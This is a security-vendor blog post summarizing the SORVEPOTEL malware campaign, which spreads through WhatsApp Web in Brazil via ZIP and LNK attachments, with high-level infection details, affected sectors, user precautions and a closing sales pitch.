A newly discovered malware campaign has emerged in Brazil, using WhatsApp as a vector to rapidly infect Windows systems. The threat, dubbed SORVEPOTEL, exploits trusted communication channels and focuses on speed and widespread propagation, impacting various sectors including government, technology, and education.

Key Takeaways

• SORVEPOTEL malware campaign is currently targeting Brazilian WhatsApp users on Windows.

• The malware spreads via phishing messages with malicious ZIP file attachments.

• Infected accounts are often banned due to excessive spam propagation.

• The intent is rapid distribution, rather than data theft or ransomware.

• Multiple sectors, including public service and manufacturing, have been affected.

How SORVEPOTEL Infects Systems

The SORVEPOTEL campaign begins when WhatsApp users receive phishing messages from compromised contacts, making the messages seem trustworthy. These messages usually contain a ZIP attachment disguised as a harmless document, such as a receipt or an app file.

In some cases, the malicious ZIP files are also distributed through deceptive emails. When recipients open the ZIP attachment on a desktop, they encounter a shortcut file (LNK). Executing this file triggers a PowerShell script, which downloads the actual malware payload from a remote server. Once installed, the payload sets itself to start automatically with Windows, ensuring persistence.

Self-Propagation Through WhatsApp Web

One of SORVEPOTEL's standout features is its use of the WhatsApp Web application for self-propagation. If the malware detects an active WhatsApp Web session on the infected device, it automatically circulates the malicious ZIP file to all of the victim’s contacts and groups. This aggressive and automated approach rapidly expands the spread of the malware.

However, this high volume of outgoing spam often triggers WhatsApp’s automated defenses, leading to account suspensions or outright bans. While significant disruption occurs, there is no current evidence that the attackers are stealing or encrypting data from victims’ systems.

Who Is Being Targeted?

Although anyone using WhatsApp on Windows could be vulnerable, statistics show 457 out of 477 known infections have occurred in Brazil. Impacted organizations span:

• Government

• Public Services

• Manufacturing

• Technology

• Education

• Construction

This trend suggests attackers may be prioritizing enterprise and institutional users who frequently access WhatsApp via desktop systems.

Security Recommendations

To minimize the risk of SORVEPOTEL infection, experts recommend the following precautions:

1. Never open suspicious email or WhatsApp attachments, especially ZIP files, from unverified sources.

2. Avoid running unexpected shortcut (LNK) files on your desktop.

3. Keep your antivirus and security solutions up to date.

4. Regularly monitor WhatsApp account activity for signs of compromise.

By remaining vigilant and following good cybersecurity hygiene, users and organizations can protect themselves from rapidly spreading threats like SORVEPOTEL. As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

References

• Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL, The Hacker News.